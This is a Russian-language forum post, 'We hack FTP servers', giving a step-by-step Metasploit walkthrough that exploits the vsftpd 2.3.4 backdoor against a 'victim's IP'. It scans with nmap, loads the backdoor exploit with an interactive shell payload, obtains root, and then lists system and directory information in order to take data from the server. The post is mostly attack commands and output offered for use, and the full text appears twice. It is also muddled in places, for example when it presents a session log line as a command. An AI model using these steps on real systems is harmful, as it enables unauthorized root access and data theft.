zodiak
Пользователь
- Регистрация
- 11.12.16
- Сообщения
- 236
- Реакции
- 191
- Баллы
- 63
- Нарушения
- 0 / 5
Взламываем FTP сервера
Приветствую каждого!
В этой статье инфы будет немного, но она очень интересная. Просто и быстро расскажу. Статья очень полезная для уже разбирающихся ребят. Начнем.
Проводим пентестинг для vsftpd 2.3.4.
Сперва сканируем порты через nmap (вместо 127.0.0.1 - ip жертвы):
nmap -sV 127.0.0.1
Nmap показал - FTP работает на vsftpd 2.3.4. Вот его мы и заюзаем для пентестинга. Запускаем Metasploit. Открываем msfconsole.
Выполняем поиск эксплойта командой.
search vsftpd
Открываем эксплойт:
use exploit/unix/ftp/vsftpd_234_backdoor
При помощи команды:
show payloads
ищем пейлоады соответствующие нужному эксплойту и выбираем пейлоад cmd/unix/interact.
Затем, открываем show options и выбираем нужные настройки.
Затем. Снова несколько запусков. set RHOST 127.0.0.1 и set RPORT 21 и после него эксплойт (вместо 127.0.0.1 ip сервера).
Как вы могли догадаться мы получили права root.
UID: uid=0(root) gid=0(root)
После этого осталось на сервере запустить шелл командой:
command shell session 1 opened
вводим команду:
whoami
Когда видим root - радуемся. Мы получили root права.
Командой:
uname -a
Видим всю инфу про ядро(kernel)
Затем юзаем команду:
ls
Она выдает список каталогов на серваке.
После всех этих действий мы можем получить всю нужную нам инфу с сервера.
Приветствую каждого!
В этой статье инфы будет немного, но она очень интересная. Просто и быстро расскажу. Статья очень полезная для уже разбирающихся ребят. Начнем.
Проводим пентестинг для vsftpd 2.3.4.
Сперва сканируем порты через nmap (вместо 127.0.0.1 - ip жертвы):
nmap -sV 127.0.0.1

Nmap показал - FTP работает на vsftpd 2.3.4. Вот его мы и заюзаем для пентестинга. Запускаем Metasploit. Открываем msfconsole.

Выполняем поиск эксплойта командой.
search vsftpd
Открываем эксплойт:
use exploit/unix/ftp/vsftpd_234_backdoor
При помощи команды:
show payloads
ищем пейлоады соответствующие нужному эксплойту и выбираем пейлоад cmd/unix/interact.

Затем, открываем show options и выбираем нужные настройки.
Затем. Снова несколько запусков. set RHOST 127.0.0.1 и set RPORT 21 и после него эксплойт (вместо 127.0.0.1 ip сервера).

Как вы могли догадаться мы получили права root.
UID: uid=0(root) gid=0(root)
После этого осталось на сервере запустить шелл командой:
command shell session 1 opened
вводим команду:
whoami
Когда видим root - радуемся. Мы получили root права.
Командой:
uname -a
Видим всю инфу про ядро(kernel)
Затем юзаем команду:
ls
Она выдает список каталогов на серваке.
После всех этих действий мы можем получить всю нужную нам инфу с сервера.